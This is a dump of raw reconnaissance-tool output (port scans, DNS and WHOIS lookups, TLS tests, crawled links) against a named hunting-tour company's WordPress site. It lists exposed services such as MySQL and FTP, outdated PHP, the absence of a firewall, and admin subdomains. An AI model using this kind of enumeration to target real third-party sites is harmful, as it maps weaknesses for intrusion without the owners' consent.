· 6 years ago · Jan 05, 2020, 09:31 AM
1####################################################################################################################################
2=====================================================================================================================================
3Hostname www.cazahispanica.com ISP 1&1 Ionos Se
4Continent Europe Flag
5DE
6Country Germany Country Code DE
7Region Unknown Local time 05 Jan 2020 09:05 CET
8City Unknown Postal Code Unknown
9IP Address 217.160.131.142 Latitude 51.299
10======================================================================================================================================
11######################################################################################################################################
12> www.cazahispanica.com
13Server: 38.132.106.139
14Address: 38.132.106.139#53
15
16Non-authoritative answer:
17Name: www.cazahispanica.com
18Address: 217.160.131.142
19>
20####################################################################################################################################
21 Domain Name: CAZAHISPANICA.COM
22 Registry Domain ID: 258094625_DOMAIN_COM-VRSN
23 Registrar WHOIS Server: whois.nicline.com
24 Registrar URL: http://www.nicline.com
25 Updated Date: 2019-11-17T08:16:47Z
26 Creation Date: 2005-11-16T11:19:01Z
27 Registry Expiry Date: 2020-11-16T11:19:01Z
28 Registrar: Arsys Internet, S.L. dba NICLINE.COM
29 Registrar IANA ID: 379
30 Registrar Abuse Contact Email:
31 Registrar Abuse Contact Phone:
32 Domain Status: ok https://icann.org/epp#ok
33 Name Server: DNS47.SERVIDORESDNS.NET
34 Name Server: DNS48.SERVIDORESDNS.NET
35 DNSSEC: unsigned
36###################################################################################################################################
37[+] Target : www.cazahispanica.com
38
39[+] IP Address : 217.160.131.142
40
41[+] Headers :
42
43[+] Date : Sun, 05 Jan 2020 08:17:15 GMT
44[+] Server : Apache
45[+] X-Powered-By : PHP/5.6.40, PleskLin
46[+] Expires : Thu, 19 Nov 1981 08:52:00 GMT
47[+] Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0
48[+] Pragma : no-cache
49[+] Link : <http://www.cazahispanica.com/wp-json/>; rel="https://api.w.org/", <http://www.cazahispanica.com/>; rel=shortlink
50[+] Set-Cookie : PHPSESSID=gj9unfg4d25cf4l6c3kmk8c8c5; path=/
51[+] Connection : close
52[+] Transfer-Encoding : chunked
53[+] Content-Type : text/html; charset=UTF-8
54
55[+] SSL Certificate Information :
56
57[-] SSL is not Present on Target URL...Skipping...
58
59[+] Whois Lookup :
60
61[+] NIR : None
62[+] ASN Registry : ripencc
63[+] ASN : 8560
64[+] ASN CIDR : 217.160.0.0/16
65[+] ASN Country Code : DE
66[+] ASN Date : 2001-03-07
67[+] ASN Description : ONEANDONE-AS Brauerstrasse 48, DE
68[+] cidr : 217.160.131.0/24
69[+] name : SCHLUND-CUSTOMERS
70[+] handle : IPAD-RIPE
71[+] range : 217.160.131.0 - 217.160.131.255
72[+] description : 1&1 Internet AG
73[+] country : ES
74[+] state : None
75[+] city : None
76[+] address : Brauerstraße 48
7776135
78Karlsruhe
79GERMANY
80[+] postal_code : None
81[+] emails : ['abuse@oneandone.net']
82[+] created : 2014-12-01T14:36:24Z
83[+] updated : 2014-12-01T14:36:24Z
84
85[+] Crawling Target...
86
87[+] Looking for robots.txt........[ Found ]
88[+] Extracting robots Links.......[ 2 ]
89[+] Looking for sitemap.xml.......[ Found ]
90[+] Extracting sitemap Links......[ 156 ]
91[+] Extracting CSS Links..........[ 13 ]
92[+] Extracting Javascript Links...[ 19 ]
93[+] Extracting Internal Links.....[ 30 ]
94[+] Extracting External Links.....[ 4 ]
95[+] Extracting Images.............[ 10 ]
96
97[+] Total Links Extracted : 204
98
99[+] Dumping Links in /opt/FinalRecon/dumps/www.cazahispanica.com.dump
100[+] Completed!
101####################################################################################################################################
102[i] Scanning Site: http://www.cazahispanica.com
103
104
105
106B A S I C I N F O
107====================
108
109
110[+] Site Title: Caza Hispanica | Your hunting company in Spain
111[+] IP address: 217.160.131.142
112[+] Web Server: Apache
113[+] CMS: WordPress
114[+] Cloudflare: Not Detected
115[+] Robots File: Found
116
117-------------[ contents ]----------------
118User-agent: *
119Disallow: /wp-admin/
120Allow: /wp-admin/admin-ajax.php
121
122-----------[end of contents]-------------
123
124
125
126W H O I S L O O K U P
127========================
128
129 Domain Name: CAZAHISPANICA.COM
130 Registry Domain ID: 258094625_DOMAIN_COM-VRSN
131 Registrar WHOIS Server: whois.nicline.com
132 Registrar URL: http://www.nicline.com
133 Updated Date: 2019-11-17T08:16:47Z
134 Creation Date: 2005-11-16T11:19:01Z
135 Registry Expiry Date: 2020-11-16T11:19:01Z
136 Registrar: Arsys Internet, S.L. dba NICLINE.COM
137 Registrar IANA ID: 379
138 Registrar Abuse Contact Email:
139 Registrar Abuse Contact Phone:
140 Domain Status: ok https://icann.org/epp#ok
141 Name Server: DNS47.SERVIDORESDNS.NET
142 Name Server: DNS48.SERVIDORESDNS.NET
143 DNSSEC: unsigned
144 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
145>>> Last update of whois database: 2020-01-05T08:17:28Z <<<
146
147For more information on Whois status codes, please visit https://icann.org/epp
148
149
150
151The Registry database contains ONLY .COM, .NET, .EDU domains and
152Registrars.
153
154
155
156
157G E O I P L O O K U P
158=========================
159
160[i] IP Address: 217.160.131.142
161[i] Country: Germany
162[i] State:
163[i] City:
164[i] Latitude: 51.2993
165[i] Longitude: 9.491
166
167
168
169
170H T T P H E A D E R S
171=======================
172
173
174[i] HTTP/1.1 200 OK
175[i] Date: Sun, 05 Jan 2020 08:17:37 GMT
176[i] Server: Apache
177[i] X-Powered-By: PHP/5.6.40
178[i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
179[i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
180[i] Pragma: no-cache
181[i] Link: <http://www.cazahispanica.com/wp-json/>; rel="https://api.w.org/", <http://www.cazahispanica.com/>; rel=shortlink
182[i] Set-Cookie: PHPSESSID=mbia876n8vm2tkkpih84fpd7q0; path=/
183[i] X-Powered-By: PleskLin
184[i] Connection: close
185[i] Content-Type: text/html; charset=UTF-8
186
187
188
189
190D N S L O O K U P
191===================
192
193cazahispanica.com. 3599 IN SOA dns47.servidoresdns.net. hostmaster.servidoresdns.net. 2019080615 21600 3600 2419200 60
194cazahispanica.com. 3599 IN NS dns47.servidoresdns.net.
195cazahispanica.com. 3599 IN NS dns48.servidoresdns.net.
196cazahispanica.com. 3599 IN A 217.160.131.142
197cazahispanica.com. 3599 IN MX 10 mx.serviciodecorreo.es.
198cazahispanica.com. 3599 IN TXT "v=spf1 include:_spf.serviciodecorreo.es ~all"
199
200
201
202
203S U B N E T C A L C U L A T I O N
204====================================
205
206Address = 217.160.131.142
207Network = 217.160.131.142 / 32
208Netmask = 255.255.255.255
209Broadcast = not needed on Point-to-Point links
210Wildcard Mask = 0.0.0.0
211Hosts Bits = 0
212Max. Hosts = 1 (2^0 - 0)
213Host Range = { 217.160.131.142 - 217.160.131.142 }
214
215
216
217N M A P P O R T S C A N
218============================
219
220Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-05 08:17 UTC
221Nmap scan report for cazahispanica.com (217.160.131.142)
222Host is up (0.088s latency).
223rDNS record for 217.160.131.142: s18161039.onlinehome-server.info
224
225PORT STATE SERVICE
22621/tcp open ftp
22722/tcp open ssh
22823/tcp closed telnet
22980/tcp open http
230110/tcp closed pop3
231143/tcp closed imap
232443/tcp open https
2333389/tcp closed ms-wbt-server
234
235Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
236
237
238
239S U B - D O M A I N F I N D E R
240==================================
241
242
243[i] Total Subdomains Found : 1
244
245[+] Subdomain: www.cazahispanica.com
246[-] IP: 217.160.131.142
247
248####################################################################################################################################
249[+] Starting At 2020-01-05 03:17:33.725336
250[+] Collecting Information On: http://www.cazahispanica.com/
251[#] Status: 200
252--------------------------------------------------
253[#] Web Server Detected: Apache
254[#] X-Powered-By: PHP/5.6.40, PleskLin
255[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
256- Date: Sun, 05 Jan 2020 08:17:31 GMT
257- Server: Apache
258- X-Powered-By: PHP/5.6.40, PleskLin
259- Expires: Thu, 19 Nov 1981 08:52:00 GMT
260- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
261- Pragma: no-cache
262- Link: <http://www.cazahispanica.com/wp-json/>; rel="https://api.w.org/", <http://www.cazahispanica.com/>; rel=shortlink
263- Set-Cookie: PHPSESSID=s2vct4h1ato3cactlf4a75dkg0; path=/
264- Connection: close
265- Transfer-Encoding: chunked
266- Content-Type: text/html; charset=UTF-8
267--------------------------------------------------
268[#] Finding Location..!
269[#] status: success
270[#] country: Germany
271[#] countryCode: DE
272[#] region: BW
273[#] regionName: Baden-Württemberg
274[#] city: Karlsruhe
275[#] zip: 76139
276[#] lat: 48.9997
277[#] lon: 8.38573
278[#] timezone: Europe/Berlin
279[#] isp: SCHLUND
280[#] org: 1&1 Internet SE
281[#] as: AS8560 1&1 Internet SE
282[#] query: 217.160.131.142
283--------------------------------------------------
284[x] Didn't Detect WAF Presence on: http://www.cazahispanica.com/
285--------------------------------------------------
286[#] Starting Reverse DNS
287[-] Failed ! Fail
288--------------------------------------------------
289[!] Scanning Open Port
290[#] 21/tcp open ftp
291[#] 22/tcp open ssh
292[#] 80/tcp open http
293[#] 443/tcp open https
294[#] 3306/tcp open mysql
295[#] 8443/tcp open https-alt
296--------------------------------------------------
297[+] Getting SSL Info
298[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate (_ssl.c:1076)
299--------------------------------------------------
300[+] Collecting Information Disclosure!
301[#] Detecting sitemap.xml file
302[!] sitemap.xml File Found: http://www.cazahispanica.com//sitemap.xml
303[#] Detecting robots.txt file
304[!] robots.txt File Found: http://www.cazahispanica.com//robots.txt
305[#] Detecting GNU Mailman
306[-] GNU Mailman App Not Detected!?
307--------------------------------------------------
308[+] Crawling Url Parameter On: http://www.cazahispanica.com/
309--------------------------------------------------
310[#] Searching Html Form !
311[-] No Html Form Found!?
312--------------------------------------------------
313[!] Found 3 dom parameter
314[#] http://www.cazahispanica.com//#mobile-menu
315[#] http://www.cazahispanica.com//#nextSection
316[#] http://www.cazahispanica.com//#top
317--------------------------------------------------
318[!] 1 Internal Dynamic Parameter Discovered
319[+] http://www.cazahispanica.com/xmlrpc.php?rsd
320--------------------------------------------------
321[-] No external Dynamic Paramter Found!?
322--------------------------------------------------
323[!] 74 Internal links Discovered
324[+] http://www.cazahispanica.com/xmlrpc.php
325[+] http://www.cazahispanica.com/wp-content/uploads/2015/07/favicon.jpg
326[+] http://www.cazahispanica.com/
327[+] http://www.cazahispanica.com/feed/
328[+] http://www.cazahispanica.com/comments/feed/
329[+] http://www.cazahispanica.com/wp-includes/wlwmanifest.xml
330[+] http://www.cazahispanica.com/wp-content/plugins/js_composer/assets/css/vc-ie8.css
331[+] http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-32x32.jpg
332[+] http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-192x192.jpg
333[+] http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-180x180.jpg
334[+] http://www.cazahispanica.com//mailto:info@cazahispanica.com
335[+] http://www.cazahispanica.com/
336[+] http://www.cazahispanica.com/
337[+] http://www.cazahispanica.com/about-us/
338[+] http://www.cazahispanica.com/about-us/
339[+] http://www.cazahispanica.com/about-us/media/
340[+] http://www.cazahispanica.com/about-us/conventions/
341[+] http://www.cazahispanica.com/hunting/
342[+] http://www.cazahispanica.com/hunting/species/
343[+] http://www.cazahispanica.com/hunting/species/spanish-ibex/
344[+] http://www.cazahispanica.com/hunting/species/deer/
345[+] http://www.cazahispanica.com/hunting/species/chamois-2/
346[+] http://www.cazahispanica.com/hunting/species/wild-sheep/
347[+] http://www.cazahispanica.com/hunting/species/balearean-goat-2/
348[+] http://www.cazahispanica.com/hunting/species/wild-boar/
349[+] http://www.cazahispanica.com/hunting/species/spanish-wolf/
350[+] http://www.cazahispanica.com/hunting/species/red-legged-partridge/
351[+] http://www.cazahispanica.com/hunting/hunting-experience/
352[+] http://www.cazahispanica.com/hunting/hunting-experience/transport-and-company/
353[+] http://www.cazahispanica.com/hunting/hunting-experience/hosting-and-accommodation/
354[+] http://www.cazahispanica.com/hunting/hunting-experience/meals-and-boards/
355[+] http://www.cazahispanica.com/hunting/hunting-experience/the-hunt/
356[+] http://www.cazahispanica.com/hunting/hunting-experience/documents/
357[+] http://www.cazahispanica.com/hunting/hunting-experience/taxidermy/
358[+] http://www.cazahispanica.com/hunting/hunting-experience/hunt-in-spain-getting-ready/
359[+] http://www.cazahispanica.com/hunting/hunting-experience/photos-hunting-in-spain/
360[+] http://www.cazahispanica.com/hunting/hunting-experience/hunting-in-spain-video-collection/
361[+] http://www.cazahispanica.com/hunting/tourism-and-sightseeing/
362[+] http://www.cazahispanica.com/hunting/spain-hunting-packages/
363[+] http://www.cazahispanica.com/testimonials/
364[+] http://www.cazahispanica.com/blog/
365[+] http://www.cazahispanica.com/faq/
366[+] http://www.cazahispanica.com/contact-us/
367[+] http://www.cazahispanica.com/
368[+] http://www.cazahispanica.com/about-us/
369[+] http://www.cazahispanica.com/about-us/
370[+] http://www.cazahispanica.com/about-us/media/
371[+] http://www.cazahispanica.com/about-us/conventions/
372[+] http://www.cazahispanica.com/hunting/
373[+] http://www.cazahispanica.com/hunting/species/
374[+] http://www.cazahispanica.com/hunting/species/spanish-ibex/
375[+] http://www.cazahispanica.com/hunting/species/deer/
376[+] http://www.cazahispanica.com/hunting/species/chamois-2/
377[+] http://www.cazahispanica.com/hunting/species/wild-sheep/
378[+] http://www.cazahispanica.com/hunting/species/balearean-goat-2/
379[+] http://www.cazahispanica.com/hunting/species/wild-boar/
380[+] http://www.cazahispanica.com/hunting/species/spanish-wolf/
381[+] http://www.cazahispanica.com/hunting/species/red-legged-partridge/
382[+] http://www.cazahispanica.com/hunting/hunting-experience/
383[+] http://www.cazahispanica.com/hunting/hunting-experience/transport-and-company/
384[+] http://www.cazahispanica.com/hunting/hunting-experience/hosting-and-accommodation/
385[+] http://www.cazahispanica.com/hunting/hunting-experience/meals-and-boards/
386[+] http://www.cazahispanica.com/hunting/hunting-experience/the-hunt/
387[+] http://www.cazahispanica.com/hunting/hunting-experience/documents/
388[+] http://www.cazahispanica.com/hunting/hunting-experience/taxidermy/
389[+] http://www.cazahispanica.com/hunting/hunting-experience/hunt-in-spain-getting-ready/
390[+] http://www.cazahispanica.com/hunting/hunting-experience/photos-hunting-in-spain/
391[+] http://www.cazahispanica.com/hunting/hunting-experience/hunting-in-spain-video-collection/
392[+] http://www.cazahispanica.com/hunting/tourism-and-sightseeing/
393[+] http://www.cazahispanica.com/hunting/spain-hunting-packages/
394[+] http://www.cazahispanica.com/testimonials/
395[+] http://www.cazahispanica.com/blog/
396[+] http://www.cazahispanica.com/faq/
397[+] http://www.cazahispanica.com/contact-us/
398--------------------------------------------------
399[!] 6 External links Discovered
400[#] http://gmpg.org/xfn/11
401[#] https://plus.google.com/+Cazahispanica
402[#] https://twitter.com/cazahispanica
403[#] https://www.facebook.com/CazaHispanica
404[#] https://instagram.com/cazahispanica/
405[#] https://plus.google.com/u/0/109493036396885801729/videos
406--------------------------------------------------
407[#] Mapping Subdomain..
408[!] Found 2 Subdomain
409- cazahispanica.com
410- www.cazahispanica.com
411--------------------------------------------------
412[!] Done At 2020-01-05 03:17:50.093861
413####################################################################################################################################
414Trying "cazahispanica.com"
415;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48420
416;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
417
418;; QUESTION SECTION:
419;cazahispanica.com. IN ANY
420
421;; ANSWER SECTION:
422cazahispanica.com. 3600 IN TXT "v=spf1 include:_spf.serviciodecorreo.es ~all"
423cazahispanica.com. 3600 IN MX 10 mx.serviciodecorreo.es.
424cazahispanica.com. 3600 IN A 217.160.131.142
425cazahispanica.com. 3600 IN SOA dns47.servidoresdns.net. hostmaster.servidoresdns.net. 2019080615 21600 3600 2419200 60
426cazahispanica.com. 3600 IN NS dns47.servidoresdns.net.
427cazahispanica.com. 3600 IN NS dns48.servidoresdns.net.
428
429Received 250 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 1105 ms
430###################################################################################################################################
431; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace cazahispanica.com any
432;; global options: +cmd
433. 82367 IN NS m.root-servers.net.
434. 82367 IN NS b.root-servers.net.
435. 82367 IN NS k.root-servers.net.
436. 82367 IN NS d.root-servers.net.
437. 82367 IN NS c.root-servers.net.
438. 82367 IN NS h.root-servers.net.
439. 82367 IN NS j.root-servers.net.
440. 82367 IN NS g.root-servers.net.
441. 82367 IN NS e.root-servers.net.
442. 82367 IN NS a.root-servers.net.
443. 82367 IN NS i.root-servers.net.
444. 82367 IN NS l.root-servers.net.
445. 82367 IN NS f.root-servers.net.
447;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 89 ms
448
449com. 172800 IN NS a.gtld-servers.net.
450com. 172800 IN NS b.gtld-servers.net.
451com. 172800 IN NS c.gtld-servers.net.
452com. 172800 IN NS d.gtld-servers.net.
453com. 172800 IN NS e.gtld-servers.net.
454com. 172800 IN NS f.gtld-servers.net.
455com. 172800 IN NS g.gtld-servers.net.
456com. 172800 IN NS h.gtld-servers.net.
457com. 172800 IN NS i.gtld-servers.net.
458com. 172800 IN NS j.gtld-servers.net.
459com. 172800 IN NS k.gtld-servers.net.
460com. 172800 IN NS l.gtld-servers.net.
461com. 172800 IN NS m.gtld-servers.net.
462com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
464;; Received 1177 bytes from 192.203.230.10#53(e.root-servers.net) in 121 ms
465
466cazahispanica.com. 172800 IN NS dns47.servidoresdns.net.
467cazahispanica.com. 172800 IN NS dns48.servidoresdns.net.
468CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
470NIMQ041U2K33GE3AD744GSUSAFFKF83M.com. 86400 IN NSEC3 1 1 0 - NIMR1TUNJSLTFN9QR13ME7THD9JMSNAE NS DS RRSIG
472;; Received 652 bytes from 192.52.178.30#53(k.gtld-servers.net) in 120 ms
473
474cazahispanica.com. 3600 IN SOA dns47.servidoresdns.net. hostmaster.servidoresdns.net. 2019080615 21600 3600 2419200 60
475cazahispanica.com. 3600 IN NS dns48.servidoresdns.net.
476cazahispanica.com. 3600 IN NS dns47.servidoresdns.net.
477cazahispanica.com. 3600 IN A 217.160.131.142
478cazahispanica.com. 3600 IN MX 10 mx.serviciodecorreo.es.
479cazahispanica.com. 3600 IN TXT "v=spf1 include:_spf.serviciodecorreo.es ~all"
480;; Received 289 bytes from 217.76.128.164#53(dns47.servidoresdns.net) in 198 ms
481
482###################################################################################################################################
483[*] Performing General Enumeration of Domain: cazahispanica.com
484[-] DNSSEC is not configured for cazahispanica.com
485[*] SOA dns47.servidoresdns.net 217.76.128.164
486[*] NS dns47.servidoresdns.net 217.76.128.164
487[*] NS dns48.servidoresdns.net 82.223.218.164
488[*] MX mx.serviciodecorreo.es 82.223.190.100
489[*] A cazahispanica.com 217.160.131.142
490[*] TXT cazahispanica.com v=spf1 include:_spf.serviciodecorreo.es ~all
491[*] Enumerating SRV Records
492[-] No SRV Records Found for cazahispanica.com
493[+] 0 Records Found
494###################################################################################################################################
495[*] Processing domain cazahispanica.com
496[*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a', '192.168.0.1']
497[+] Getting nameservers
498217.76.128.164 - dns47.servidoresdns.net
49982.223.218.164 - dns48.servidoresdns.net
500[-] Zone transfer failed
501
502[+] TXT records found
503"v=spf1 include:_spf.serviciodecorreo.es ~all"
504
505[+] MX records found, added to target list
50610 mx.serviciodecorreo.es.
507
508[*] Scanning cazahispanica.com for A records
509217.160.131.142 - cazahispanica.com
51082.223.190.241 - autoconfig.cazahispanica.com
51182.223.190.241 - autodiscover.cazahispanica.com
512217.76.128.55 - control.cazahispanica.com
51382.223.190.234 - webmail.cazahispanica.com
514217.160.131.142 - www.cazahispanica.com
515###################################################################################################################################
516 AVAILABLE PLUGINS
517 -----------------
518
519 RobotPlugin
520 EarlyDataPlugin
521 CertificateInfoPlugin
522 OpenSslCcsInjectionPlugin
523 SessionResumptionPlugin
524 SessionRenegotiationPlugin
525 HeartbleedPlugin
526 CompressionPlugin
527 FallbackScsvPlugin
528 OpenSslCipherSuitesPlugin
529 HttpHeadersPlugin
530
531
532
533 CHECKING HOST(S) AVAILABILITY
534 -----------------------------
535
536 217.160.131.142:443 => 217.160.131.142
537
538
539
540
541 SCAN RESULTS FOR 217.160.131.142:443 - 217.160.131.142
542 ------------------------------------------------------
543
544 * SSLV3 Cipher Suites:
545 Server rejected all cipher suites.
546
547 * OpenSSL CCS Injection:
548 OK - Not vulnerable to OpenSSL CCS injection
549
550 * SSLV2 Cipher Suites:
551 Server rejected all cipher suites.
552
553 * TLSV1_1 Cipher Suites:
554 Forward Secrecy OK - Supported
555 RC4 OK - Not Supported
556
557 Preferred:
558 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
559 Accepted:
560 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
561 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
562 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
563 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
564 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
565 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
566 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
567 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
568 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
569 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
570 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
571 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
572 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
573
574 * TLSV1 Cipher Suites:
575 Forward Secrecy OK - Supported
576 RC4 OK - Not Supported
577
578 Preferred:
579 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
580 Accepted:
581 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
582 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
583 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
584 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
585 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
586 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
587 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
588 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
589 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
590 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
591 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
592 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
593 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
594
595 * Certificate Information:
596 Content
597 SHA1 Fingerprint: 99071423593dfbd332ec7db7e8fdb0b955813476
598 Common Name: Parallels Panel
599 Issuer: Parallels Panel
600 Serial Number: 1422356774
601 Not Before: 2015-01-27 11:06:14
602 Not After: 2016-01-27 11:06:14
603 Signature Algorithm: sha1
604 Public Key Algorithm: RSA
605 Key Size: 2048
606 Exponent: 65537 (0x10001)
607 DNS Subject Alternative Names: []
608
609 Trust
610 Hostname Validation: FAILED - Certificate does NOT match 217.160.131.142
611 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
612 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
613 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: self signed certificate
614 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: self signed certificate
615 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: self signed certificate
616 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
617 Received Chain: Parallels Panel
618 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
619 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
620 Received Chain Order: OK - Order is valid
621 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
622
623 Extensions
624 OCSP Must-Staple: NOT SUPPORTED - Extension not found
625 Certificate Transparency: NOT SUPPORTED - Extension not found
626
627 OCSP Stapling
628 NOT SUPPORTED - Server did not send back an OCSP response
629
630 * Deflate Compression:
631 OK - Compression disabled
632
633 * TLS 1.2 Session Resumption Support:
634 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
635 With TLS Tickets: OK - Supported
636
637 * OpenSSL Heartbleed:
638 OK - Not vulnerable to Heartbleed
639
640 * TLSV1_3 Cipher Suites:
641 Server rejected all cipher suites.
642
643 * Session Renegotiation:
644 Client-initiated Renegotiation: OK - Rejected
645 Secure Renegotiation: OK - Supported
646
647 * Downgrade Attacks:
648 TLS_FALLBACK_SCSV: OK - Supported
649
650 * TLSV1_2 Cipher Suites:
651 Forward Secrecy OK - Supported
652 RC4 OK - Not Supported
653
654 Preferred:
655 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
656 Accepted:
657 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
658 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
659 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
660 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
661 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
662 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
663 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
664 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
665 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
666 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
667 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
668 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
669 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
670 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
671 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
672 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
673 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
674 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
675 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
676 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
677 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
678 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
679 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
680 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
681 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
682 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
683
684 * ROBOT Attack:
685 OK - Not vulnerable
686
687
688 SCAN COMPLETED IN 27.51 S
689 -------------------------
690###################################################################################################################################
691Domains still to check: 1
692 Checking if the hostname cazahispanica.com. given is in fact a domain...
693
694Analyzing domain: cazahispanica.com.
695 Checking NameServers using system default resolver...
696 IP: 217.76.128.164 (Spain)
697 HostName: dns47.servidoresdns.net Type: NS
698 HostName: dns47.servidoresdns.net Type: PTR
699 IP: 82.223.218.164 (Spain)
700 HostName: dns48.servidoresdns.net Type: NS
701 HostName: dns48.servidoresdns.net Type: PTR
702
703 Checking MailServers using system default resolver...
704 IP: 82.223.190.100 (Spain)
705 HostName: mx.serviciodecorreo.es Type: MX
706 HostName: mx.serviciodecorreo.es Type: PTR
707
708 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
709 No zone transfer found on nameserver 217.76.128.164
710 No zone transfer found on nameserver 82.223.218.164
711
712 Checking SPF record...
713
714 Checking SPF record...
715
716 Checking SPF record...
717 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.85.0/24, but only the network IP
